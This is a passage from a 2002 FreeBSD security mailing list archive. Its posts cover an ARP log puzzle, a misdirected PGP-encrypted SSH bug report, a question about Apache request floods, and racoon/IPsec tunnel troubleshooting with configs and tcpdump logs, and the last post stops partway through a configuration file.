From owner-freebsd-security Sun Jul 28 13:24:41 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 831FD37B400 for ; Sun, 28 Jul 2002 13:24:38 -0700 (PDT)
Received: from sccrmhc02.attbi.com (sccrmhc02.attbi.com [204.127.202.62]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8EEDA43E3B for ; Sun, 28 Jul 2002 13:24:32 -0700 (PDT) (envelope-from craig@millerfam.net)
Received: from Desktop ([12.236.220.188]) by sccrmhc02.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020728202431.CRZO1451.sccrmhc02.attbi.com@Desktop>; Sun, 28 Jul 2002 20:24:31 +0000
Message-ID: <002001c23674$adb8a260$fe01a8c0@Desktop>
From: "Craig Miller"
To: "Duncan Patton a Campbell is Dhu" , "faSty"
Cc:
References: <006301c22e83$2b3d5b30$fe01a8c0@Desktop> <20020718204203.GA71330@i-sphere.com> <20020718204840.M67510@babayaga.neotext.ca>
Subject: Re: wierdness in my security report
Date: Sun, 28 Jul 2002 13:23:47 -0700
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

That is correct, they are not my MAC addresses. Also, based on the MAC address it is Cisco hardware, further pointing toward AT&T's hardware, since my FreeBSD box definitely is not made by Cisco.

--Craig

----- Original Message -----
From: "Duncan Patton a Campbell is Dhu"
To: "faSty" ; "Craig Miller"
Cc:
Sent: Thursday, July 18, 2002 1:48 PM
Subject: Re: wierdness in my security report

> This I've seen too, but he sez the MACs aren't his....
>
> Duncan Patton a Campbell is Duibh ;-)
>
> ---------- Original Message -----------
> From: faSty
> To: Craig Miller
> Sent: Thu, 18 Jul 2002 13:42:03 -0700
> Subject: Re: wierdness in my security report
>
> > Do you have a bridge on your server?
> >
> > I have seen the same thing: the two bridged Ethernet
> > ports fight over which one masters the primary IP address.
> >
> > -fasty
> >
> > On Thu, Jul 18, 2002 at 10:47:21AM -0700, Craig Miller wrote:
> > > Anyone have any ideas as to what might be causing the
> > > following to appear in my security report?
> > >
> > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:54 to 00:b0:64:b7:6f:a8 on dc0
> > > Jul 17 05:47:56 server /kernel: arp: 12.236.220.1 moved from 00:b0:64:b7:6f:54 to 00:b0:64:b7:6f:a8 on dc0
> > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:a8 to 00:b0:64:b7:6f:54 on dc0
> > > Jul 17 05:47:57 server /kernel: arp: 12.236.220.1 moved from 00:b0:64:b7:6f:a8 to 00:b0:64:b7:6f:54 on dc0
> > >
> > > I thought those colon-delimited fields would be MAC addresses,
> > > but they don't match the MAC addresses of either of the two
> > > cards in my FreeBSD box. I have not checked the MAC addresses
> > > of the other network cards on my network.
> > >
> > > Also, where does the "server /kernel" name come from?
> > > "kernel" is not the name I gave my kernel, so I am suspicious.
> > > > > > Thanks, > > > > > > --Craig > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the > > message > ------- End of Original Message ------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jul 28 23:28: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 31C2A37B400 for ; Sun, 28 Jul 2002 23:28:03 -0700 (PDT) Received: from thor.piqnet.org (adsl-66-125-235-59.dsl.sntc01.pacbell.net [66.125.235.59]) by mx1.FreeBSD.org (Postfix) with ESMTP id 18EEB43E4A for ; Sun, 28 Jul 2002 23:28:02 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (adsl-66-125-235-60.dsl.sntc01.pacbell.net [66.125.235.60]) (authenticated bits=128) by thor.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T6RtGO032114; Sun, 28 Jul 2002 23:27:56 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (localhost [127.0.0.1]) by freya.pvt.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T6RoBg037405; Sun, 28 Jul 2002 23:27:50 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by freya.pvt.piqnet.org (8.12.5/8.12.5/Submit) id g6T6RmgN037402; Sun, 28 Jul 2002 23:27:48 -0700 (PDT) X-Authentication-Warning: freya.pvt.piqnet.org: joelh set sender to joelh@gnu.org using -f To: security@freebsd.org Subject: SSH issue From: Joel Ray Holveck Date: 28 Jul 2002 23:27:46 -0700 Message-ID: <87wurfrqu5.fsf@freya.pvt.piqnet.org> Lines: 76 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="=-=-=" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: 
(List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=-=-= I originally sent this message a week ago, and received no response. I was having trouble with my mail config at the time, but I thought it went out okay. I would appreciate it if you could please acknowledge that you received it. As always, I would appreciate any advice you may have on this matter. You certainly have more experience than I do in security matters, so I would appreciate your advice on how to proceed. If you feel it's appropriate, I can look for the buggy code on my own, and write a patch. However, I would appreciate your insight into this issue. Thanks, joelh --=-=-= Content-Type: message/rfc822 Content-Disposition: inline Return-Path: Received: from freya.pvt.piqnet.org (freya.pvt.piqnet.org [192.168.13.8]) by thor.piqnet.org (8.12.5/8.12.3) with ESMTP id g6LNf49q041595 for ; Sun, 21 Jul 2002 16:41:04 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (localhost [127.0.0.1]) by freya.pvt.piqnet.org (8.12.3/8.12.3) with ESMTP id g6LNerx1025502; Sun, 21 Jul 2002 16:40:53 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by freya.pvt.piqnet.org (8.12.3/8.12.3/Submit) id g6LNerkE025499; Sun, 21 Jul 2002 16:40:53 -0700 (PDT) X-Authentication-Warning: freya.pvt.piqnet.org: joelh set sender to joelh@gnu.org using -f Sender: joelh@freya.pvt.piqnet.org To: security-officer@freebsd.org Subject: SSH issue From: Joel Ray Holveck Precedence: first-class Date: 21 Jul 2002 16:40:53 -0700 Message-ID: <8765z87ipm.fsf@freya.pvt.piqnet.org> Lines: 34 X-Spam-Status: No, hits=3.7 required=5.0 tests=X_AUTH_WARNING,UPPERCASE_50_75,AWL version=2.30 X-Spam-Level: *** MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii -----BEGIN PGP MESSAGE----- Version: GnuPG v1.0.7 (FreeBSD) hIwDVS4eLnPSiKUBBACe9X9i7XHexcM61pNUxBbPHHRs3/7+oFzH4bSBRRY31XcR IR3vSvf3trWJNnXb7pF5PoJIFOFif4rrnJBjErmeBbtE11wwa5phtsZttb7hanUH 
96zaNxCKK7lSNzfOLNHiyRYKvkgUdg4+ou2A8Za2GE0upi3/q0uz4igXYFVqrYUC DgO7y92/FY6jdxAH/2CM5VRsW7E5EQFb0omjjSWIHGH2nerX1W7P+Gmzl0dW/xft u5PVbHHQWzVfHWSzqhSk4hzw/0sEpToMOVjbfiMvWVLgvvX6tk4i0E7Xldfwv+DV fxWzcUwWRzKde0FvVwPW6jGPRYJDKR30b/nYfit7cF/hc7okZk+wdC6pDLAiHmNS oPexWxa0IWFQMnt7WNMUHX+v1DfOHoICYCfRvLq5uiAYk2ZXOdrdYnqr4IXmk+7+ XxWdGVp/iP45DzjIg91xocuHYA/TOROKnhxy/O+IJMQbD6WdvfUjkTIRFwMcVn1Z dgF2r1zRaG/75XvQwjPnTBaN3XkW/IRs0/BUWeIIAIVtjtyVMfKDE1EU7pTsghmM iQzmJ4qcjZL3TAXJ++9n4RuIWwlN4h6d5FIGr9ySISu1o5KDDQgTgSiqSdrueJ5F eCK0BQLEpJRIW6zAWHbmASF1ujhc+7sTIPCnBi6tGPElcaY3hXCqquduo+Zh1zik oSXSUnThpBD1c3hBwHX3EMm2WdOY4FtTSojNlH3W1mETw6u2oAkBkc/PDQRGoAfE evKMssTDcRIGwehwiCiSVSTDkH4gqO1557Q4jYxNTm9jmVnx9jTbvxGbKFXCMIPe 1inTl6hInRMmmRFCAr+QywPqkGee8f2ZF8HPzTRRom3+lOk78ctmgNjPubXiEk7J 6a6MOmSdQ7sZPBsMDqJcUy1BCjnVAbqpa84k86wOFSwPWVbc4f1zVcbf241tKxyW xvTcpwkjPg2J/NBPY2tmucm/8mss6WCEawDMknWm7Vqb1Eo8sF0Z2fASV/8vJzL9 0cc/0cQs+aWF03UihHhjr8YniCWWvv2oZIpFyBNRw6/MsAKspdnYUY7JURZ65DPX IBoRMZHnEUOhBUYU80ZyvvW+48c50+HRAwIl1pC0FKNZ76XIm6sb9F4d3JKEL3VY MRXmcsWETVVKmS9ubUIaZNCNg1REiOh+n3n/Pq8if9kOODQo/tVbmePHwlbwIGoD mvxx/GjrC0Z3NKapQQaX8Pnse6gcsIiYxgRI7+Gmw9I4TE3h0UTBgag6Uep4C2R7 EOIct3Ar5cGwNx7Tq2K1jGkoQ0rcPd3z7CykR55GkcXVaU2Y9iGO/Ubticw7LlNo WL5XyDl/KF2kLLhQ5WzIMvkldfNZYm3mebr4vSMTfUHYFRvUMMciSrVs1TMNoYBI NHKvNXUCRdesKRu5p0NHoqaC1SFomwpmBfMBg8alWM82IaxPJITVhy7cbdLj8q8G yl84RjUvXp0x3sYus/DeZob9uQfZZLOkj/fcD2xwkSvKE2xghwk3FiDa9Zn5Hdq2 cr61vxmxMvqCddqG+ludxn31I4t+VFMXObHALdAegCDxpnH9iBCcgWKTe1DAh1HL q24tX6y03vDRdiWE6qj99LH4pvJyTXfnuPiB+PQh4M5AE1ZfUZDryKQ0pHkkDI9G atF90QOgcxHgPm8p//GD8A+X6fe3ZI7tcna09uN1CD1vTJMR4qZgIsG1D3WdIrWE RnNXyYE7ROO/cUG220bN8mAEdjZJLMSyrnky69/tevVLRpjAoY1BCQM8gAABDz2Q K8q2jULab5Y= =NE54 -----END PGP MESSAGE----- --=-=-=-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 0: 0:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org 
(mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C0E6937B400 for ; Mon, 29 Jul 2002 00:00:49 -0700 (PDT) Received: from thor.piqnet.org (adsl-66-125-235-59.dsl.sntc01.pacbell.net [66.125.235.59]) by mx1.FreeBSD.org (Postfix) with ESMTP id 16A7C43E65 for ; Mon, 29 Jul 2002 00:00:49 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (adsl-66-125-235-60.dsl.sntc01.pacbell.net [66.125.235.60]) (authenticated bits=128) by thor.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T70lGO032402; Mon, 29 Jul 2002 00:00:47 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from freya.pvt.piqnet.org (localhost [127.0.0.1]) by freya.pvt.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T70gBg037496; Mon, 29 Jul 2002 00:00:42 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by freya.pvt.piqnet.org (8.12.5/8.12.5/Submit) id g6T70gLL037493; Mon, 29 Jul 2002 00:00:42 -0700 (PDT) X-Authentication-Warning: freya.pvt.piqnet.org: joelh set sender to joelh@gnu.org using -f To: security@freebsd.org Subject: Re: SSH issue References: <87wurfrqu5.fsf@freya.pvt.piqnet.org> From: Joel Ray Holveck Date: 29 Jul 2002 00:00:42 -0700 In-Reply-To: <87wurfrqu5.fsf@freya.pvt.piqnet.org> Message-ID: <87sn23rpb9.fsf@freya.pvt.piqnet.org> Lines: 14 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After I sent my last message a few minutes ago, I got an email from saying that my email had been "quarantined" because it contained a PGP-encrypted section. After I stopped laughing, I figured I should let whoever didn't get my last message know what happened. The antivirus@ message didn't say who the recipient at that point was; it only listed security-officer@freebsd.org. 
Anyway, whoever was being so steadfastly protected from the terror of secure communication, you can get my message at http://www.piqnet.org/ssh-message.txt Cheers, joelh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 1:56:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 80F1637B400 for ; Mon, 29 Jul 2002 01:56:33 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 19E3443E3B for ; Mon, 29 Jul 2002 01:56:33 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 02D76535C; Mon, 29 Jul 2002 10:56:30 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Joel Ray Holveck Cc: security@freebsd.org Subject: Re: SSH issue References: <87wurfrqu5.fsf@freya.pvt.piqnet.org> From: Dag-Erling Smorgrav Date: 29 Jul 2002 10:56:30 +0200 In-Reply-To: <87wurfrqu5.fsf@freya.pvt.piqnet.org> Message-ID: Lines: 7 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Why are you sending this to security@freebsd.org, which is an open mailing list, if you don't want it read by anyone but the security officer? 
DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jul 29 2: 4:34 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4AD2F37B400 for ; Mon, 29 Jul 2002 02:04:33 -0700 (PDT)
Received: from odsource.com (12-220-120-77.client.insightBB.com [12.220.120.77]) by mx1.FreeBSD.org (Postfix) with ESMTP id A54C043E31 for ; Mon, 29 Jul 2002 02:04:32 -0700 (PDT) (envelope-from cyrus@odsource.com)
Received: from odsource.com (localhost.odsource.com [127.0.0.1]) by odsource.com (8.12.5/8.11.6) with ESMTP id g6T94PcM047624 for ; Mon, 29 Jul 2002 05:04:26 -0400 (EDT) (envelope-from cyrus@odsource.com)
Received: from localhost (cyrus@localhost) by odsource.com (8.12.5/8.12.5/Submit) with ESMTP id g6T94O7s047621 for ; Mon, 29 Jul 2002 05:04:25 -0400 (EDT) (envelope-from cyrus@odsource.com)
Date: Mon, 29 Jul 2002 05:04:24 -0400 (EDT)
From: Cyrus
To: security@freebsd.org
Subject: counter apache DoS attacks?
Message-ID: <20020729050402.Q47608-100000@odsource.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Several people get their jollies off by having different servers infinitely request my main page thousands of times each, therefore shooting my memory to poo and a lot of bandwidth. But my problem is the memory, not the bandwidth. I've looked through mod_throttle and such; not for me. Is there anything out there that can automatically detect and take an action for this type of attack? I dunno... like use route on the offender's IP and such. But for it to do this automatically. Anyone have any suggestions?

Thanks in advance.
-Cyrus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 2: 7: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EDCB537B400 for ; Mon, 29 Jul 2002 02:07:00 -0700 (PDT) Received: from thor.piqnet.org (adsl-66-125-235-59.dsl.sntc01.pacbell.net [66.125.235.59]) by mx1.FreeBSD.org (Postfix) with ESMTP id 11FDD43E67 for ; Mon, 29 Jul 2002 02:07:00 -0700 (PDT) (envelope-from joelh@gnu.org) Received: from thor.piqnet.org (joelh@localhost [127.0.0.1]) by thor.piqnet.org (8.12.5/8.12.5) with ESMTP id g6T96wGN032787; Mon, 29 Jul 2002 02:06:58 -0700 (PDT) (envelope-from joelh@gnu.org) Received: (from joelh@localhost) by thor.piqnet.org (8.12.5/8.12.5/Submit) id g6T96vO8032784; Mon, 29 Jul 2002 02:06:57 -0700 (PDT) X-Authentication-Warning: thor.piqnet.org: joelh set sender to joelh@gnu.org using -f To: Dag-Erling Smorgrav Cc: security@freebsd.org Subject: Re: SSH issue References: <87wurfrqu5.fsf@freya.pvt.piqnet.org> From: Joel Ray Holveck Date: 29 Jul 2002 02:06:56 -0700 In-Reply-To: Message-ID: <8765yykimn.fsf@thor.piqnet.org> Lines: 16 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Why are you sending this to security@freebsd.org, which is an open > mailing list, if you don't want it read by anyone but the security > officer? Oops. Wrong address. 
Apologies all around,
joelh

[goes off and looks sheepish somewhere else]

--
Joel Ray Holveck - joelh@gnu.org
Fourth law of programming: Anything that can go wrong wi
sendmail: segmentation violation - core dumped

From owner-freebsd-security Mon Jul 29 7:45:42 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0B97337B400 for ; Mon, 29 Jul 2002 07:45:37 -0700 (PDT)
Received: from trish.dyn.magenet.com (bgp01560565bgs.gambrl01.md.comcast.net [68.50.32.109]) by mx1.FreeBSD.org (Postfix) with ESMTP id AF1E843E42 for ; Mon, 29 Jul 2002 07:45:35 -0700 (PDT) (envelope-from trish@egobsd.org)
Received: from trish.dyn.magenet.com (trish@localhost [127.0.0.1]) by trish.dyn.magenet.com (8.12.5/8.12.1) with ESMTP id g6TEkU9D008190; Mon, 29 Jul 2002 10:46:31 -0400 (EDT)
Received: from localhost (trish@localhost) by trish.dyn.magenet.com (8.12.5/8.12.5/Submit) with ESMTP id g6TEkU0N008187; Mon, 29 Jul 2002 10:46:30 -0400 (EDT)
X-Authentication-Warning: trish.dyn.magenet.com: trish owned process doing -bs
Date: Mon, 29 Jul 2002 10:46:30 -0400 (EDT)
From: Trish Lynch
X-X-Sender:
To:
Subject: racoon and weirdness....
Message-ID: <20020729103029.R484-100000@trish.dyn.magenet.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm working on setting up IPSEC tunnels between a KAME/racoon/FreeBSD-STABLE box and a Ravlin unit at a client's.

What is happening with the one tunnel is this: after a couple of days, it times out, and neither side can reestablish traffic between them; the log in /var/log/daemon for racoon tells me the tunnel *is* established, but I can't ping through it.
If I restart racoon, it all starts working fine again.

The second issue is a second machine, with a cut/pasted config in racoon.conf, with simply the endpoints changed, that does not work at all. I can ping the external interface of the Ravlin, but it doesn't even *begin* phase 1.

Here is the racoon.conf:

remote ravlin-ext-ip [500] {
        exchange_mode main,aggressive;
        my_identifier address my-ext-ip;
        peers_identifier address ravlin-ext-ip;
        generate_policy on;
        nonce_size 16;
        lifetime time 3 hour;   # sec,min,hour
        proposal {
                encryption_algorithm 3des;
                hash_algorithm md5;
                authentication_method pre_shared_key ;
                dh_group 1 ;
        }
}

remote ravlin-int-ip [500] {
        exchange_mode main,aggressive;
        my_identifier address my-int-ip;
        peers_identifier address ravlin-int-ip;
        generate_policy on;
        nonce_size 16;
        lifetime time 3 hour;   # sec,min,hour
        proposal {
                encryption_algorithm 3des;
                hash_algorithm sha1;
                authentication_method pre_shared_key ;
                dh_group 2 ;
        }
}

sainfo address my-ext-ip/32[0] any address ravlin-ext-ip/32[0] any {
        # pfs_group 2;
        lifetime time 10800 sec;
        encryption_algorithm 3des ;
        authentication_algorithm hmac_md5,hmac_sha1;
        compression_algorithm deflate ;
}

sainfo address my-int-net/23[0] any address ravlin-int-net/24[0] any {
        # pfs_group 2;
        lifetime time 10800 sec;
        encryption_algorithm 3des ;
        authentication_algorithm hmac_md5,hmac_sha1;
        compression_algorithm deflate ;
}

The gif interface is set up as such:

BSD2 == my machine
BSD5 == Ravlin

$IFCONFIG $GIF3 plumb
$IFCONFIG $GIF3 mtu 1500
$IFCONFIG $GIF3 inet $BSD2_IP $BSD5_IP netmask $NETMASK
/usr/sbin/setkey -FP
/usr/sbin/setkey -F
/usr/sbin/setkey -c << EOF
spdadd $BSD2_PUB_NET $BSD5_PUB_NET any -P out ipsec esp/tunnel/${BSD2_PUB_IP}-${BSD5_PUB_IP}/require;
spdadd $BSD5_PUB_NET $BSD2_PUB_NET any -P in ipsec esp/tunnel/${BSD5_PUB_IP}-${BSD2_PUB_IP}/require;
EOF

Anyone wanna hit me with a cluebat?
-Trish -- Trish Lynch trish@egobsd.org Ecartis Core Team Key fingerprint = B04E 67CA 3A12 9930 E91C 7730 4606 3618 B74A 2493 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 9:35:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AC2B737B400; Mon, 29 Jul 2002 09:35:04 -0700 (PDT) Received: from mail.seton.org (ftp.seton.org [207.193.126.172]) by mx1.FreeBSD.org (Postfix) with ESMTP id 23AE643E3B; Mon, 29 Jul 2002 09:35:04 -0700 (PDT) (envelope-from mgrooms@seton.org) Received: from aus-gwia.aus.dcnhs.org (aus-gwia.aus.dcnhs.org [10.20.10.211]) by mail.seton.org (Postfix) with ESMTP id A87E6D0086; Mon, 29 Jul 2002 11:35:00 -0500 (CDT) Received: from AUS_SETON-MTA by aus-gwia.aus.dcnhs.org with Novell_GroupWise; Mon, 29 Jul 2002 11:34:59 -0500 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Mon, 29 Jul 2002 11:34:47 -0500 From: "Matthew Grooms" To: , Subject: Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ... Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dru, I did some checking this morning with tcpdump ( as you suggested ) and here is the info. When the ipsec session is initiated from the inside of my home network ( freebsd->vpn1 ), nothing happens. I assume since the vpn1 box does not even find this traffic interesting. Here is the log output from the respective endpoints. FreeBSD side ... 
tcpdump: listening on ed0
11:47:42.628327 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip)
11:48:02.818812 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip)
11:48:22.109505 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip)
11:48:42.119398 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip)
11:49:02.130134 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip)
11:49:22.150308 66.90.146.202 > 65.118.63.252: 10.22.200.1.500 > 10.21.2.253.500: isakmp: phase 1 I ident: [|sa] (ipip)
^C
340 packets received by filter
0 packets dropped by kernel

Linux / VPN1 side ...

tcpdump: listening on eth0
11:23:35.854538 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip)
11:23:35.855482 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0]
11:23:56.020501 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip)
11:23:56.020576 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0]
11:24:15.307853 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip)
11:24:15.307931 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0]
11:24:35.361459 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip)
11:24:35.361542 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0]
11:24:55.376960 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip)
11:24:55.377046 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0]
11:25:15.357907 66.90.146.202 > 65.118.63.252: 10.22.200.1.isakmp > 10.21.2.253.isakmp: isakmp: phase 1 I ident: [|sa] (ipip)
11:25:15.357962 65.118.63.252 > 66.90.146.202: icmp: 65.118.63.252 protocol 4 unreachable [tos 0xc0]
1073807371 packets received by filter
1 packets dropped by kernel

The really interesting part for me is when the ipsec session is initiated by the vpn1 side. Racoon accepts the traffic and responds. Here is the log output from the respective sides for this scenario.

FreeBSD side ...

tcpdump: listening on ed0
11:53:29.269204 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: [|sa] (DF)
11:53:29.381550 66.90.146.202.500 > 65.118.63.252.500: isakmp: phase 1 R agg: [|sa]
11:53:29.462243 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: (hash: len=16) (DF)
11:53:29.575229 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: (hash: len=16) (DF)
11:53:29.670112 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 1 I agg: (hash: len=16) (DF)
11:53:30.001215 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
11:53:32.001928 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
11:53:34.002585 65.118.63.252.500 > 66.90.146.202.500: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
^C
60 packets received by filter
0 packets dropped by kernel

Linux / VPN1 side ...

tcpdump: listening on eth0
11:29:22.374083 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: [|sa] (DF)
11:29:22.551798 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 1 R agg: [|sa]
11:29:22.569977 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF)
11:29:22.677674 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF)
11:29:22.777666 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF)
11:29:23.106051 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
11:29:25.107675 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
11:29:27.107672 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)

Here is my racoon.conf file ...

# $KAME: racoon.conf.in,v 1.18 2001/08/16 06:33:40 itojun Exp $

path pre_shared_key "/usr/local/etc/racoon/psk.txt" ;
path certificate "/usr/local/etc/cert" ;

log debug2;

# "padding" defines some parameter of padding. You should not touch these.
padding {
        maximum_length 20;      # maximum padding length.
        randomize off;          # enable randomize length.
        strict_check off;       # enable strict check.
        exclusive_tail off;     # extract last one octet.
}

# if no listen directive is specified, racoon will listen to all
# available interface addresses.
listen {
        #isakmp ::1 [7000];
        #admin [7002];          # administrative's port by kmpstat.
        #strict_address;        # required all addresses must be bound.
}

# Specification of default various timer.
timer {
